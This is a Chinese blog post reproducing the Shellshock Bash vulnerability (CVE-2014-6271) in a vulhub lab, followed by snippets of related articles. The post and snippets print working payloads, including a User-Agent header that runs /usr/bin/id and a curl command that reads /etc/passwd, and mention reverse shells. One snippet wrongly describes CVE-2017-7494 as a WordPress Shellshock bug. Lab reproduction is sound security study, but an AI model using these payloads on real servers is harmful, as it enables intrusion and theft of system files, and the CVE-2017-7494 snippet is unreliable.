Shellshock 破壳漏洞(CVE-2014-6271)

最新推荐文章于 2024-05-28 13:53:41 发布
最新推荐文章于 2024-05-28 13:53:41 发布
阅读量477 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/119206509
版权

漏洞简介

GNU Bash 4.3及之前版本中存在安全漏洞,该漏洞源于程序没有正确处理环境变量值内的函数定义。远程攻击者可借助特制的环境变量利用该漏洞执行任意代码。

漏洞复现

将payload附在User-Agent中访问victim.cgi,即可执行命令:

User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id

在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞(CVE-2014-6271)综合分析1
08-04
漏洞(CVE-2014-6271)综合分析】 一、威胁卡片 漏洞,也称为Bash Shellshock,是由法国的安全研究员Stéphane Chazelas在2014年9月中旬发现的。这个漏洞被赋予了CVE编号CVE-2014-6271,属于A级威胁响应...
CVE-2014-6271“漏洞利用过程
D-river博客
11-12 9108
前言CVE-2014-6271(即“漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。实验环境攻击机:kali linux 目标机: Ubuntu ip: 10.10.10.129漏洞验证 Bash版本小于等于4.3可能存在漏洞
漏洞(CVE-2014-6271)综合分析
Star——Flying in the cyberspace
11-25 2974
目 录 一、 威胁卡片  二、 概述  三、 已知事件发布/披露情况 四、 漏洞的影响范围  五、 漏洞原理  六、 漏洞验证方法  七、 漏洞检测方法  八、 漏洞可能会带来的影响  九、 针对此漏洞的建议  十、 写在最后的啰嗦的话      一、     威胁卡片 二、概述        2014年9月24日Bash被公布存在远程代码执行漏洞,安天实验室
Bash Bug(漏洞Shellshock- CVE-2014-6271
HaSaKing的博客
05-28 519
漏洞是对全球数以百万计的系统构成威胁的严重安全漏洞。通过理解其原理并学习如何检测和修补,您可以显著提高自己系统的安全性。始终保持系统和软件的最新状态是保护自己免受此类漏洞攻击的关键策略。
【vulhub】shellshock-bash漏洞复现与利用
qq_45300786的博客
09-13 821
详细说明请看 https://www.cnblogs.com/cute-puli/p/14649873.html 楼主这里只做实验 3个exp exp1 curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://192.168.100.34:8080/victim.cgi exp2 User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id exp3 User-
CVE-2014-6271-bash shellshock-漏洞复现
m0_62008601的博客
08-06 3022
这些变量可以包含代码,在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场,服务启动后,有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied,那就是权限不足的原因了,那我们就修改一下权限,让它能够被访问。既然在victim.cgi可以执行命令,那么应该就可以进行反弹shell了,kali开启端口监听,执行反弹shell命令。.
Vulhub-Shellshock Remote Command Injection (CVE-2014-6271)
ad12456的博客
05-18 454
Shellshock远程命令注入
shellshock-shell:针对 Shellschok CVE-2014-6271 错误的一个简单的类似 python shell 的漏洞利用
07-10
针对 Shellschok CVE-2014-6271 错误的一个简单的类似 python shell 的漏洞利用。 使用它来利用已知的易受攻击的 URL。 此工具只能在您自己的授权 URL 上使用。 此工具的作者对其使用不承担任何责任。 文件名:...
漏洞(ShellShock)官方修补补丁(2014.10.05)
10-13
修补了包括CVE-2014-6271(最原始的漏洞)、CVE-2014-7169、CVE-2014-7186、CVE-2014-7187、CVE-2014-6277和CVE-2014-6278。这些Bash漏洞现在都是漏洞集中的,目前所有补丁,截止2014.10.05的官方补丁已经...
shellshock-cgi:一个 Python 脚本,用于枚举特定服务器上易受 CVE-2014-6271 攻击的 CGI 脚本
05-29
一个 Python 脚本,用于枚举特定服务器上易受 CVE-2014-6271 攻击的 CGI 脚本 用法 $ python testing.py --server 172.16.255.130 --listen 172.16.255.1 ##示例返回: [+] Testing if 172.16.255.130 is ...
ShellShock-CGI-Scan:用C语言编写的脚本,用于检查CGI脚本是否容易受到CVE-2014-6271的攻击(The Bash Bug)
05-25
用C语言编写的脚本,用于检查CGI脚本是否容易受到CVE-2014-6271(The Bash Bug)的攻击。 选项: -i (local ip-address) -p (port to listen) -l (site list) -t (connection timeout) (Default: 15s) 示例:$ ./...
vulhub漏洞复现之bash(Shellshock CVE-2014-6271)
weixin_43071873的博客
11-27 1248
Shellshock 漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。 2.漏洞影响:GNU Bash <= 4.3
vulhub漏洞复现-bash(CVE-2014-6271) shellshock-漏洞
weixin_45095113的博客
12-21 418
vulhub漏洞复现-bash(CVE-2014-6271) shellshock-漏洞复现
CVE-2014-6271——bash漏洞复现
per_se_veran_ce的博客
08-23 932
(1)检查是否存在bash漏洞 env x=’() { :;}; echo vulnerable’ bash -c “echo this is a test” 安装、配置apache服务 Apache支持CGI 在cgi-bin下创建一个cgi测试文件test.cgi,并赋予它777的权限 chmod 777 test.cgi curl -H 'x: () { :;...
BASH BUG:cve-2014-6271验证与利用
Linuxer's Blog Data
04-18 1493
来源:Mickey@360网络攻防实验室 Stephane Schazelas最近发现BASH的一个BUG,问题在于BASH在处理环境变量的时候,这个漏洞影响bash版本1.14 - 4.3, 受影响的发行版本包括:     Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution     C
ShellShockCVE-2014-6271)
qq_41672971的博客
12-07 107
shellshock
Shellshock)系列漏洞简要分析及检测
Traxer的学习之路
03-13 4487
1.漏洞简介2.POC验证2.1 CVE 2014-6271最开始的shell测试脚本如下,主要的代码是第五行,它先使用env命令将() { :;}; echo vulnerable赋值给环境变量x,随后启动一个新的bash进程并执行命令echo test,并将错误信息重定向到null,再查找有无’vulnerable’这个字符串输出,如果输出成功则表示存在漏洞:#!/bin/bash EXITCO
漏洞分析】CVE-2014-6271 Shellshock漏洞 bypass disable_functions
4ut15m's blog
03-07 547
序 我是真懒. 漏洞信息 小于4.3版本的bash会将以"(){"开头的环境变量解析为函数,解析后bash不会退出,会继续执行.故而可构造payload达到命令执行. 本地利用 payload: 环境变量='() { :; };cmd;' 另起一进程. ...
cve-2017-7494
最新发布
06-13
CVE-2017-7494是一个知名的网络安全漏洞,它影响的是WordPress平台的一个插件,具体来说是"Layered Tech Marketing Platform"插件中的一个安全漏洞。这个漏洞被称为"Shellshock(波加莱尔)"或"BASH bug",源于Linux的 Bash shell的一个设计缺陷。 漏洞利用了当Web服务器接收到包含恶意参数的HTTP请求时,会执行恶意的shell命令,因为Bash shell没有正确处理环境变量中的特殊符号。攻击者可以通过精心构造的URL触发这个漏洞,从而在服务器上执行任意代码,可能导致数据泄露、权限提升或整个服务器的控制权被接管。 解决这个问题的方法通常包括更新WordPress和受影响的插件到最新版本,修复或禁用存在漏洞的部分,并强化服务器安全配置,例如限制环境变量的使用或者关闭不必要的服务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值